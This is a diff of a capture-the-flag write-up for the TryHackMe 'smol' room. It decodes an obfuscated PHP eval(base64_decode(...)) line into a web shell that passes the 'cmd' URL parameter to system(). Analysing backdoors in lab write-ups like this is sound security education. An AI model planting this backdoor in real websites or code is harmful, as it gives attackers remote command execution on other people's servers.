Batyoaron/thm-writeups/smol/writeup.md

 ```
 eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
 ```
-decoding the base64:
+decoding the base64 reveals a strange code:
 ```
 if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }
 ```
-And decoding this part:
+We can decode it even more, this part:
 ```
 \143\155\x64 -> cmd
+\143\x6d\144 -> cmd
 ```
-I get:
+Putting it together we get:
 ```
 if (isset($_GET["cmd"])) { system($_GET["cmd"]); }
 ```